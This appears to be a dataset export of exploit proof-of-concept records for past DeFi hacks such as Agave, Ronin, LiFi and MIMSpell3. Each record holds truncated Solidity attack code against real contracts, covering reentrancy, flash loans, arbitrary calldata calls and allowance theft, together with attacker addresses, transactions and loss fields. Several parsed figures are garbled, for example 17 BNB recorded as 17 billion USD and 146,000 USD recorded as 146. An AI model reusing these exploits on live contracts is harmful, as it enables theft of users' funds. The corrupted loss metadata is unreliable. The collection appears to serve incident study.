source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Root cause: ERC667 tokens hooks reentrancy. Attacker wallet: 0xd041ad9aae5cf96b21c3ffcb303a0cb80779e358 Attacker contract: 0xdbf225e3d626ec31f502d435b0f72d82b08e1bdd Attack tx: https://gnosiss...
exploit_poc
HundredFinance
2022-03
HundredFinance_exp.sol
flash_loan
0c20c431200552e2
2026-01-07T10:59:16.538667
postmortems
unknown
21,120,319
null
null
null
null
null
https://gnosisscan.io/tx/0x534b84f657883ddc1b66a314e8b392feb35024afdec61dfe8e7c510cfac1a098
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { borrow(); console.log("Attacker Profit: %s usdc", usdc.balanceOf(address(this)) / 1e6); }
true
Unknown
6.56
medium
HundredFinance Exploit (2022-03)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract EvilToken { IMasterChef masterchef; IERC20 usdt = IERC20(0x55d398326f99059fF775485246999027B319...
exploit_poc
Paraluni
2022-03
Paraluni_exp.sol
null
436779daaf731fc4
2026-01-07T10:59:16.538726
postmortems
unknown
16,008,280
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { token0 = new EvilToken(IMasterChef(address(0))); token1 = new EvilToken(masterchef); pair.swap(10_000 * 1e18, 10_000 * 1e18, address(this), new bytes(1)); emit log_named_uint("Before exploit, Dai balance of attacker:", usdt.balanceOf(msg.sender)); ...
true
Unknown
3.85
low
Paraluni Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { ICErc20Delegate cTUSD = ICErc20Delegate(0x12392F67bdf24faE0AF363c24aC620a2f67DAd86); IERC20 tusd = IERC20(0x0000000000085d4780B73119b644AE5ecd22b376); ad...
exploit_poc
CompoundTusd
2022-03
CompoundTusd_exp.sol
null
9c463930ec3c6ca0
2026-01-07T10:59:16.538772
postmortems
unknown
14,266,479
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExample() public { emit log_named_uint("Before exploit, Compound TUSD balance:", tusd.balanceOf(address(cTUSD))); cTUSD.sweepToken(tusdLegacy); emit log_named_uint("After exploit, Compound TUSD balance:", tusd.balanceOf(address(cTUSD))); }
true
Unknown
2.44
low
CompoundTusd Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { ITreasureMarketplaceBuyer itreasure = ITreasureMarketplaceBuyer(0x812cdA2181ed7c45a35a691E0C85E231D218E273); IERC721 iSmolBrain = IERC721(0x6325439389E0797Ab...
exploit_poc
TreasureDAO
2022-03
TreasureDAO_exp.sol
null
becd624c55818705
2026-01-07T10:59:16.538806
postmortems
unknown
7,322,694
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { nftOwner = iSmolBrain.ownerOf(tokenId); emit log_named_address("Original NFT owner of SmolBrain:", nftOwner); itreasure.buyItem(0x6325439389E0797Ab35752B4F43a14C004f22A9c, 3557, nftOwner, 0, 6_969_000_000_000_000_000_000); emit log_named_address("Exploit ...
true
Unknown
2.58
low
TreasureDAO Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Redacted Cartel Custom Approval Logic Exploit PoC The vulnerability would have allowed a malicious attacker to assign a user’s allowance to themselves, enabling the attacker to steal that use...
exploit_poc
RedactedCartel
2022-03
RedactedCartel_exp.sol
null
7c13338b2fb17afe
2026-01-07T10:59:16.538866
postmortems
unknown
13,908,185
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { //quick hack to bypass the "onlyAuthorisedOperators" modifier cheats.prank(owner); wxBTRFLY.unFreezeToken(); console.log("Before the Exploit !"); console.log("Alice wxBTRFLY Token Balance: ", wxBTRFLY.balanceOf(Alice)); console.log("Bob wx...
true
Unknown
3.75
low
RedactedCartel Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface IGnosisBridgedAsset is IERC20 { function mint(address, uint256) external returns (bool); } // @KeyInfo - Total Lost : ~1.5M US$ // Attacker : https://gnosisscan.io/address/0x0a16a85...
exploit_poc
Agave
2022-03
Agave_exp.sol
flash_loan
f59704de6f414262
2026-01-07T10:59:16.538924
postmortems
unknown
21,120,283
~1.5M US$
1,500,000
https://gnosisscan.io/address/0x0a16a85be44627c10cee75db06b169c7bc76de2c
https://gnosisscan.io/address/0xF98169301B06e906AF7f9b719204AA10D1F160d6
https://gnosisscan.io/address/0x207E9def17B4bd1045F5Af2C651c081F9FDb0842
https://gnosisscan.io/tx/0xa262141abcf7c127b88b4042aee8bf601f4f3372c9471dbd75cb54e76524f18e
https://medium.com/agavefinance/agave-exploit-reentrancy-in-liquidation-call-51ae407bc56
https://twitter.com/Mudit__Gupta/status/1503783633877827586
true
true
true
critical
~1.5M US$
flash-loan
function testExploit() public balanceLog { //Call prepare and get it setup _initHF(); _flashWETH(); }
true
~1.5M US$
https://gnosisscan.io/address/0x0a16a85be44627c10cee75db06b169c7bc76de2c
https://gnosisscan.io/address/0xF98169301B06e906AF7f9b719204AA10D1F160d6
https://gnosisscan.io/address/0x207E9def17B4bd1045F5Af2C651c081F9FDb0842
https://gnosisscan.io/tx/0xa262141abcf7c127b88b4042aee8bf601f4f3372c9471dbd75cb54e76524f18e
https://medium.com/agavefinance/agave-exploit-reentrancy-in-liquidation-call-51ae407bc56
https://twitter.com/Mudit__Gupta/status/1503783633877827586
$1.50M
10
high
Agave Exploit (2022-03)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IUniswapV2Pair pair = IUniswapV2Pair(0xbC2C5392b0B841832bEC8b9C30747BADdA7b7...
exploit_poc
Revest
2022-03
Revest_exp.sol
reentrancy
46b9e755db3871c6
2026-01-07T10:59:16.538997
postmortems
unknown
14,465,356
null
null
null
null
null
null
null
null
false
false
true
medium
null
reentrancy
function testExploit() public { emit log_named_uint("Before exploit, Rena balance of attacker:", rena.balanceOf(msg.sender)); pair.swap(5 * 1e18, 0, address(this), new bytes(1)); emit log_named_uint("After exploit, Rena balance of attacker:", rena.balanceOf(msg.sender)); }
true
Unknown
4.33
low
Revest Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "./../interface.sol"; contract MockACOToken { function collateral() public view returns (address) { return address(0); } function mintToPayabl...
exploit_poc
Auctus
2022-03
Auctus_exp.sol
null
b321d224e7ce60b7
2026-01-07T10:59:16.539042
postmortems
unknown
14,460,635
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function test() public { emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender)); acowrite.write{value: 1}( address(this), 1, address(usdc), abi.encodeWithSelector( bytes4(keccak256(bytes("transferFrom(a...
true
Unknown
2.95
low
Auctus Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IUniswapV2Pair pair = IUniswapV2Pair(0xbcab7d083Cf6a01e0DdA9ed7F8a02b47d125e682); IERC20 usdc = IERC20(0x04068DA6C83AFCFA0e13ba15A6696662335D5B75); IOneR...
exploit_poc
OneRing
2022-03
OneRing_exp.sol
null
b3464cb31adb7042
2026-01-07T10:59:16.539080
postmortems
unknown
34,041,499
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender)); pair.swap(80_000_000 * 1e6, 0, address(this), new bytes(1)); emit log_named_uint("After exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender)); }
true
Unknown
2.67
low
OneRing Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; interface IRoninBridge { function withdrawERC20For( uint256 _withdrawalId, address _user, ...
exploit_poc
Ronin
2022-03
Ronin_exp.sol
null
a8e08ce9b320a71b
2026-01-07T10:59:16.539122
postmortems
unknown
14,442,834
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { cheats.startPrank(attacker); IRoninBridge(roninBridge).withdrawERC20For({ // 0x993e1c42 _withdrawalId: 2_000_000, _user: attacker, _token: WETH, _amount: 173_600_000_000_000_000_000_000, _signatures: hex"01175db...
true
Unknown
3.48
low
Ronin Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface ILIFI { struct LiFiData { bytes32 transactionId; string integrator; address referrer; address sendingAssetId; address receivingAssetId; ...
exploit_poc
LiFi
2022-03
LiFi_exp.sol
null
bad2d0a54b823fa2
2026-01-07T10:59:16.539308
postmortems
unknown
14,420,686
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { cheats.startPrank(from); // The Vulnerability // The hack took advantage of our pre-bridge swap feature. Our smart contract allows a caller to pass an array of multiple swaps using any address with arbitrary calldata. // This design gave us maximum flexi...
true
Unknown
5
medium
LiFi Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); ...
exploit_poc
Bacon
2022-03
Bacon_exp.sol
null
2fcc0cf7a97058b4
2026-01-07T10:59:16.539439
postmortems
unknown
14,326,931
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function test() public { emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender)); pair.swap(6_360_000_000_000, 0, address(this), new bytes(1)); emit log_named_uint("After exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender)); }
true
Unknown
2.98
low
Bacon Exploit (2022-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 20 WBNB // Attacker : https://bscscan.com/address/0x3fee6d8aaea76d06cf1ebeaf6b186af215f14088 // Attack Contract : https://bscscan.com/address/0xe82Fc275B0e3573115eaDCa465f85c4F96A6c631 // Vulnerable Co...
exploit_poc
TokenHolder
2025-10
TokenHolder_exp.sol
flash_loan
1b32369ba4da9c6e
2026-01-07T10:59:16.539480
postmortems
bsc
null
20 WBNB
20
https://bscscan.com/address/0x3fee6d8aaea76d06cf1ebeaf6b186af215f14088
https://bscscan.com/address/0xe82Fc275B0e3573115eaDCa465f85c4F96A6c631
https://bscscan.com/address/0x8c7f34436C0037742AeCf047e06fD4B27Ad01117
https://bscscan.com/tx/0xc291d70f281dbb6976820fbc4dbb3cfcf56be7bf360f2e823f339af4161f64c6
null
null
true
true
true
low
20 WBNB
flash-loan
function testExploit() public balanceLog { uint256 loadId = 0; bytes memory sellingCode = abi.encodeWithSignature("privilegedLoan(address,uint256)", WBNB, 20 ether); address tokenHolder = address(this); address inchRouter = address(0x2EeD3DC9c5134C056825b12388Ee9Be04E522173); add...
true
20 WBNB
https://bscscan.com/address/0x3fee6d8aaea76d06cf1ebeaf6b186af215f14088
https://bscscan.com/address/0xe82Fc275B0e3573115eaDCa465f85c4F96A6c631
https://bscscan.com/address/0x8c7f34436C0037742AeCf047e06fD4B27Ad01117
https://bscscan.com/tx/0xc291d70f281dbb6976820fbc4dbb3cfcf56be7bf360f2e823f339af4161f64c6
$20
8.31
high
TokenHolder Exploit (2025-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 146,000 USD // Attacker : https://arbiscan.io/address/0xd356c82e0c85e1568641d084dbdaf76b8df96c08 // Attack Contract : https://arbiscan.io/address/0xd9ff21caeeea4329133c98a...
exploit_poc
SharwaFinance
2025-10
SharwaFinance_exp.sol
flash_loan
3938541aeb219684
2026-01-07T10:59:16.539533
postmortems
arbitrum
null
146,000 USD
146
https://arbiscan.io/address/0xd356c82e0c85e1568641d084dbdaf76b8df96c08
https://arbiscan.io/address/0xd9ff21caeeea4329133c98a892db16b42f9baa25
https://arbiscan.io/address/0xd3fde5af30da1f394d6e0d361b552648d0dff797
null
null
null
true
true
true
low
146,000 USD
flash-loan
function test_exploit_sequence() public { emit log_named_uint("WBTC balance before exploit:", IERC20(WBTC).balanceOf(address(attackcontract))); attackcontract.attackTx1(); vm.roll(BLOCK_TX2 - 1); attackcontract.attackTx2(); emit log_named_uint("WBTC balance after exploit:", IERC...
true
146,000 USD
https://arbiscan.io/address/0xd356c82e0c85e1568641d084dbdaf76b8df96c08
https://arbiscan.io/address/0xd9ff21caeeea4329133c98a892db16b42f9baa25
https://arbiscan.io/address/0xd3fde5af30da1f394d6e0d361b552648d0dff797
$146
9
high
SharwaFinance Exploit (2025-10)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED // @KeyInfo - Total Lost : 1.7M USD // Attacker : https://etherscan.io/address/0x1aaade3e9062d124b7deb0ed6ddc7055efa7354d // Attack Contract : https://etherscan.io/address/0xb8e0a4758df2954063ca4ba3d094f2d6eda9b993 // Vulnerable Contract : https://etherscan.io/address/0x46f54d4340...
exploit_poc
MIMSpell3
2025-10
MIMSpell3_exp.sol
null
e9e53884eb1671c4
2026-01-07T10:59:16.539619
postmortems
ethereum
null
1.7M USD
1,700,000
https://etherscan.io/address/0x1aaade3e9062d124b7deb0ed6ddc7055efa7354d
https://etherscan.io/address/0xb8e0a4758df2954063ca4ba3d094f2d6eda9b993
https://etherscan.io/address/0x46f54d434063e5f1a2b2cc6d9aaa657b1b9ff82c
https://etherscan.io/tx/0x842aae91c89a9e5043e64af34f53dc66daf0f033ad8afbf35ef0c93f99a9e5e6
null
null
true
true
false
critical
1.7M USD
unknown
function testExploit() public balanceLog { _borrowFromAllCauldrons(); _withdrawAllMIMFromBentoBox(); _swapMIMTo3Crv(); _remove3PoolLiquidityToUSDT(); _swapUSDTToWETH(); }
true
1.7M USD
https://etherscan.io/address/0x1aaade3e9062d124b7deb0ed6ddc7055efa7354d
https://etherscan.io/address/0xb8e0a4758df2954063ca4ba3d094f2d6eda9b993
https://etherscan.io/address/0x46f54d434063e5f1a2b2cc6d9aaa657b1b9ff82c
https://etherscan.io/tx/0x842aae91c89a9e5043e64af34f53dc66daf0f033ad8afbf35ef0c93f99a9e5e6
$1.70M
9
high
MIMSpell3 Exploit (2025-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~50k $BUSD // Attacker : https://bscscan.com/address/0x8ccf2860f38fc2f4a56dec897c8c976503fcb123 // Attack Contract : https://bscscan.com/address/0x64b9d294cd918204d1ee6bce283edb49302ddf7e // Vulnerable Contract : https://bscscan...
exploit_poc
GAX
2024-07
GAX_exp.sol
null
983378ba209954e2
2026-01-07T10:59:16.539684
postmortems
bsc
40,375,925
~50k $BUSD
50,000
https://bscscan.com/address/0x8ccf2860f38fc2f4a56dec897c8c976503fcb123
https://bscscan.com/address/0x64b9d294cd918204d1ee6bce283edb49302ddf7e
https://bscscan.com/address/0xdb4b73df2f6de4afcd3a883efe8b7a4b0763822b
https://bscscan.com/tx/0x368f842e79a10bb163d98353711be58431a7cd06098d6f4b6cbbcd4c77b53108
null
null
true
false
false
medium
~50k $BUSD
unknown
function testExploit() public { emit log_named_decimal_uint("Attacker BUSD balance before attack", BUSD.balanceOf(address(this)), 18); bytes memory data = abi.encode(0, BUSD.balanceOf(address(VulnContract_addr)), 0); VulnContract_addr.call(abi.encodeWithSelector(bytes4(0x6c99d7c8), data)); ...
true
~50k $BUSD
https://bscscan.com/address/0x8ccf2860f38fc2f4a56dec897c8c976503fcb123
https://bscscan.com/address/0x64b9d294cd918204d1ee6bce283edb49302ddf7e
https://bscscan.com/address/0xdb4b73df2f6de4afcd3a883efe8b7a4b0763822b
https://bscscan.com/tx/0x368f842e79a10bb163d98353711be58431a7cd06098d6f4b6cbbcd4c77b53108
$50.0K
6.76
medium
GAX Exploit (2024-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~73K USD // TX : https://app.blocksec.com/explorer/tx/eth/0x491cf8b2a5753fdbf3096b42e0a16bc109b957dc112d6537b1ed306e483d0744 // Attacker : https://etherscan.io/address/...
exploit_poc
Spectra_finance
2024-07
Spectra_finance_exp.sol
null
552c30fcc1afb22c
2026-01-07T10:59:16.539724
postmortems
ethereum
20,369,956
~73K USD
73,000
https://etherscan.io/address/0x53635bf7b92b9512f6de0eb7450b26d5d1ad9a4c
https://etherscan.io/address/0xba8ce86147ded54c0879c9a954f9754a472704aa
null
null
null
null
true
false
false
medium
~73K USD
unknown
function attack() public { bytes memory datas = abi.encode( address(asdCRV), address(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), 0, address(this), 1, abi.encodeWithSelector( bytes4(0x23b872dd), address(victim), address(this...
true
https://etherscan.io/address/0x53635bf7b92b9512f6de0eb7450b26d5d1ad9a4c
https://etherscan.io/address/0xba8ce86147ded54c0879c9a954f9754a472704aa
$73.0K
4.99
low
Spectra_finance Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~200k USD // TX : https://app.blocksec.com/explorer/tx/eth/0xa245deda8553c6e4c575baff9b50ef35abf4c8f990f8f36897696f896f240e3a // Frontrunner : https://etherscan.io/addr...
exploit_poc
DeFiPlaza
2024-07
DeFiPlaza_exp.sol
flash_loan
e3f2d607d57e4c3c
2026-01-07T10:59:16.539778
postmortems
ethereum
20,240,538
~200k USD
200,000
https://etherscan.io/address/0x14b362d2e38250604f21a334d71c13e2ed478467
https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
null
null
null
null
true
false
true
high
~200k USD
flash-loan
false
https://etherscan.io/address/0x14b362d2e38250604f21a334d71c13e2ed478467
https://etherscan.io/address/0x6980a47bee930a4584b09ee79ebe46484fbdbdd0
$200.0K
6
medium
DeFiPlaza Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~10M USD // TX : https://app.blocksec.com/explorer/tx/eth/0xd82fe84e63b1aa52e1ce540582ee0895ba4a71ec5e7a632a3faa1aff3e763873 // Attacker : https://etherscan.io/address/...
exploit_poc
Lifiprotocol
2024-07
Lifiprotocol_exp.sol
flash_loan
2e2c13c5908678a9
2026-01-07T10:59:16.539858
postmortems
ethereum
20,318,962
~10M USD
10,000,000
https://etherscan.io/address/0x8b3cb6bf982798fba233bca56749e22eec42dcf3
https://etherscan.io/address/0x986aca5f2ca6b120f4361c519d7a49c5ac50c240
null
null
null
null
true
false
true
critical
~10M USD
flash-loan
function testExpolit() public { emit log_named_decimal_uint( "[Begin] Attacker USDT before exploit", USDT.balanceOf(address(this)), USDT.decimals() ); attack(); emit log_named_decimal_uint("[End] Attacker USDT after exploit", USDT.balanceOf(address(this)), USDT.decimals()); ...
true
https://etherscan.io/address/0x8b3cb6bf982798fba233bca56749e22eec42dcf3
https://etherscan.io/address/0x986aca5f2ca6b120f4361c519d7a49c5ac50c240
$10.00M
7.3
medium
Lifiprotocol Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~17 BNB // TX : https://app.blocksec.com/explorer/tx/bsc/0x4353a6d37e95a0844f511f0ea9300ef3081130b24f0cf7a4bd1cae26ec393101 // Attacker : https://bscscan.com/address/0x...
exploit_poc
MRP
2024-07
MRP_exp.sol
null
9659fa096333e9c3
2026-01-07T10:59:16.539910
postmortems
bsc
40,122,169
~17 BNB
17,000,000,000
https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138
https://bscscan.com/address/0x2bd8980a925e6f5a910be8cc0ad1cff663e62d9d
null
null
null
null
true
false
false
critical
~17 BNB
unknown
function testExploit() public { emit log_named_decimal_uint("[Begin] Attacker BNB before exploit", address(this).balance, 18); attack(); emit log_named_decimal_uint("[End] Attacker BNB after exploit", address(this).balance, 18); }
true
https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138
https://bscscan.com/address/0x2bd8980a925e6f5a910be8cc0ad1cff663e62d9d
$17000.00M
5.14
medium
MRP Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~18K USD // TX : https://app.blocksec.com/explorer/tx/eth/0x53334c36502bd022bd332f2aa493862fd8f722138d1989132a46efddcc6b04d4 // Attacker : https://etherscan.io/address/...
exploit_poc
MEVbot_0xdd7c
2024-07
MEVbot_0xdd7c_exp.sol
flash_loan
0814e93bba26bd8d
2026-01-07T10:59:16.539996
postmortems
ethereum
20,367,788
~18K USD
18,000
https://etherscan.io/address/0x98250d30aed204e5cbb8fef7f099bc68dbc4b896
https://etherscan.io/address/0xe10b2cfa421d0ecd5153c7a9d53dad949e1990dd
null
null
null
null
true
false
true
medium
~18K USD
flash-loan
function testExpolit() public { emit log_named_decimal_uint( "[Begin] Attacker WETH before exploit", WETH.balanceOf(address(this)), WETH.decimals() ); emit log_named_decimal_uint( "[Begin] Attacker USDT before exploit", USDT.balanceOf(address(this)), USDT.decimals() ...
true
https://etherscan.io/address/0x98250d30aed204e5cbb8fef7f099bc68dbc4b896
https://etherscan.io/address/0xe10b2cfa421d0ecd5153c7a9d53dad949e1990dd
$18.0K
7.65
medium
MEVbot_0xdd7c Exploit (2024-07)
true
false
false
false
// This contract is not verified import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~27 ETH // TX : https://etherscan.io/tx/0x1194e1d6085885ce054a7ff8cd3cd0c3fa308ec87e4ccde8dd0549842fef4f1b // Attacker : https://etherscan.io/address/0xabee16e74dd268105f166c27a847edc2b8e7cc4e // Attac...
exploit_poc
UnverifiedContr_0x452E25
2024-07
UnverifiedContr_0x452E25_exp.sol
null
fcf89a6bd607f588
2026-01-07T10:59:16.540047
postmortems
ethereum
20,223,094
~27 ETH
27
https://etherscan.io/address/0xabee16e74dd268105f166c27a847edc2b8e7cc4e
https://etherscan.io/address/0x27b27842771df79af6a69795f6fca0948c8333c0
null
null
null
null
true
false
false
low
~27 ETH
unknown
function testExploit() public { bytes memory data = abi.encode(bool(true), address(weth_)); IVictime(victime_).uniswapV3SwapCallback(27_349_000_000_000_000_000, 27_349_000_000_000_000_000, data); emit log_named_decimal_uint("profit = ", weth_.balanceOf(address(this)), 18); } receive() e...
true
~27 ETH
https://etherscan.io/address/0xabee16e74dd268105f166c27a847edc2b8e7cc4e
https://etherscan.io/address/0x27b27842771df79af6a69795f6fca0948c8333c0
$27
4.62
low
UnverifiedContr_0x452E25 Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~1.81M USD // TX : https://app.blocksec.com/explorer/tx/eth/0x92cdcc732eebf47200ea56123716e337f6ef7d5ad714a2295794fdc6031ebb2e // Attacker : https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741 // Attack Contr...
exploit_poc
DoughFina
2024-07
DoughFina_exp.sol
flash_loan
710af6252e2ced7e
2026-01-07T10:59:16.540085
postmortems
ethereum
20,288,622
~1.81M USD
1,810,000
https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741
https://etherscan.io/address/0x11a8dc866c5d03ff06bb74565b6575537b215978
null
null
null
null
true
false
true
critical
~1.81M USD
flash-loan
function testExploit() public { attack(); emit log_named_decimal_uint( "[End] Attacker WETH balance after exploit", WETH.balanceOf(address(this)), WETH.decimals() ); }
true
~1.81M USD
https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741
https://etherscan.io/address/0x11a8dc866c5d03ff06bb74565b6575537b215978
$1.81M
6.74
medium
DoughFina Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~427 ETH // TX : https://app.blocksec.com/explorer/tx/mantle/0xb3c4c313a8d3e2843c9e6e313b199d7339211cdc70c2eca9f4d88b1e155fd6bd // Attacker : https://mantlescan.info/ad...
exploit_poc
Minterest
2024-07
Minterest_exp.sol
flash_loan
7387a6821bdebc46
2026-01-07T10:59:16.540133
postmortems
unknown
66,416,576
~427 ETH
427
https://mantlescan.info/address/0x618f768af6291705eb13e0b2e96600b3851911d1
https://mantlescan.info/address/0x5fdac50aa48e3e86299a04ad18a68750b2074d2d
null
null
null
null
true
false
true
low
~427 ETH
flash-loan
function testExpolit() public { usdy.approve(address(musdy), type(uint256).max); usdy.approve(address(musd), type(uint256).max); musd.approve(address(musdy), type(uint256).max); musdy.approve(address(musdy), type(uint256).max); address[] memory addressArray = new address[](1); ...
true
https://mantlescan.info/address/0x618f768af6291705eb13e0b2e96600b3851911d1
https://mantlescan.info/address/0x5fdac50aa48e3e86299a04ad18a68750b2074d2d
$427
7.65
medium
Minterest Exploit (2024-07)
true
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~7K USD // TX : https://app.blocksec.com/explorer/tx/bsc/0x96a955304fed48a8fbfb1396ec7658e7dc42b7c140298b80ce4206df34f40e8d // Attacker : https://bscscan.com/address/0x56b2d55457b31fb4b78ebddd6718ea2667804a0...
exploit_poc
LW
2024-07
LW_exp.sol
null
f42458dc9a8e2479
2026-01-07T10:59:16.540192
postmortems
bsc
40,287,544
~7K USD
7,000
https://bscscan.com/address/0x56b2d55457b31fb4b78ebddd6718ea2667804a06
https://bscscan.com/address/0xfe7e9c76affdba7b7442adaca9c7c059ec3092fc
null
null
null
null
true
false
false
low
~7K USD
unknown
false
https://bscscan.com/address/0x56b2d55457b31fb4b78ebddd6718ea2667804a06
https://bscscan.com/address/0xfe7e9c76affdba7b7442adaca9c7c059ec3092fc
$7.0K
3.27
low
LW Exploit (2024-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~56K BUSD // TX : https://app.blocksec.com/explorer/tx/bsc/0x9a8c4c4edb7a76ecfa935780124c409f83a08d15c560bb67302182f8969be20d // Attacker : https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 // Attack Contrac...
exploit_poc
SBT
2024-07
SBT_exp.sol
null
4641e260e4fb9ebc
2026-01-07T10:59:16.540235
postmortems
bsc
40,378,160
~56K BUSD
56,000
https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
https://bscscan.com/address/0x88f9e1799465655f0dd206093dbd08922a1d9e28
null
null
null
null
true
false
false
medium
~56K BUSD
unknown
